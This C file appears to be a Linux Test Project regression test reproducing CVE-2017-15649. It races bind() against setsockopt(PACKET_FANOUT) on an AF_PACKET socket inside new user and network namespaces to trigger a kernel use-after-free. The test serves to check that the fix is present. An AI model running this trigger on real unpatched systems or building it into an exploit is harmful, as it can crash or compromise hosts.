1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3 * Copyright (c) 2018 Richard Palethorpe <rpalethorpe@suse.com>
4 * Original reproducer: https://blogs.securiteam.com/index.php/archives/3484
5 * Other copyrights may apply.
6 *
7 * CVE-2017-15649
8 *
9 * Fixed by the following commits:
10 * 4971613c "packet: in packet_do_bind, test fanout with bind_lock held"
11 * 008ba2a1 "packet: hold bind lock when rebinding to fanout hook"
12 *
13 * See blogpost in copyright notice for more details.
14 */
15 #include <errno.h>
16 #include <sched.h>
17 #include <sys/types.h>
18 #include <net/if.h>
19 #include <linux/if_packet.h>
20 #include <string.h>
21
22 #include "tst_test.h"
23 #include "tst_fuzzy_sync.h"
24 #include "lapi/if_packet.h"
25 #include "lapi/namespaces_constants.h"
26
27 static struct tst_fzsync_pair pair;
28 static int fd;
29 static struct sockaddr_ll addr;
30
setup(void)31 void setup(void)
32 {
33 int real_uid = getuid();
34 int real_gid = getgid();
35
36 TEST(unshare(CLONE_NEWUSER));
37 if (TST_RET)
38 tst_brk(TBROK | TTERRNO, "Can't create new user namespace");
39
40 TEST(unshare(CLONE_NEWNET));
41 if (TST_RET)
42 tst_brk(TBROK | TTERRNO, "Can't create new net namespace");
43
44 FILE_PRINTF("/proc/self/setgroups", "deny");
45 FILE_PRINTF("/proc/self/uid_map", "0 %d 1\n", real_uid);
46 FILE_PRINTF("/proc/self/gid_map", "0 %d 1\n", real_gid);
47
48 tst_fzsync_pair_init(&pair);
49 }
50
cleanup(void)51 void cleanup(void)
52 {
53 tst_fzsync_pair_cleanup(&pair);
54 }
55
binder(void * unused)56 void *binder(void *unused)
57 {
58 while (tst_fzsync_run_b(&pair)) {
59 tst_fzsync_start_race_b(&pair);
60 bind(fd, (struct sockaddr *)&addr, sizeof(addr));
61 tst_fzsync_end_race_b(&pair);
62 }
63
64 return unused;
65 }
66
run(void)67 void run(void)
68 {
69 int fanout_val = PACKET_FANOUT_ROLLOVER, index;
70 struct ifreq ifr;
71
72 memset(&ifr, 0, sizeof(struct ifreq));
73
74 tst_fzsync_pair_reset(&pair, binder);
75 while (tst_fzsync_run_a(&pair)) {
76 fd = SAFE_SOCKET(AF_PACKET, SOCK_RAW, PF_PACKET);
77
78 strcpy((char *)&ifr.ifr_name, "lo");
79 SAFE_IOCTL(fd, SIOCGIFINDEX, &ifr);
80 index = ifr.ifr_ifindex;
81
82 SAFE_IOCTL(fd, SIOCGIFFLAGS, &ifr);
83 ifr.ifr_flags &= ~(short)IFF_UP;
84 SAFE_IOCTL(fd, SIOCSIFFLAGS, &ifr);
85
86 addr.sll_family = AF_PACKET;
87 /* need something different to rehook && 0 to skip register_prot_hook */
88 addr.sll_protocol = 0x0;
89 addr.sll_ifindex = index;
90
91 tst_fzsync_start_race_a(&pair);
92 setsockopt(fd, SOL_PACKET, PACKET_FANOUT,
93 &fanout_val, sizeof(fanout_val));
94 tst_fzsync_end_race_a(&pair);
95
96 /* UAF */
97 close(fd);
98 }
99
100 tst_res(TPASS, "Nothing bad happened, probably...");
101 }
102
103 static struct tst_test test = {
104 .min_kver = "3.19",
105 .setup = setup,
106 .test_all = run,
107 .cleanup = cleanup,
108 .needs_root = 1,
109 .tags = (const struct tst_tag[]) {
110 {"CVE", "2017-15649"},
111 {"linux-git", "4971613c1639"},
112 {"linux-git", "008ba2a13f2d"},
113 {}
114 }
115 };
116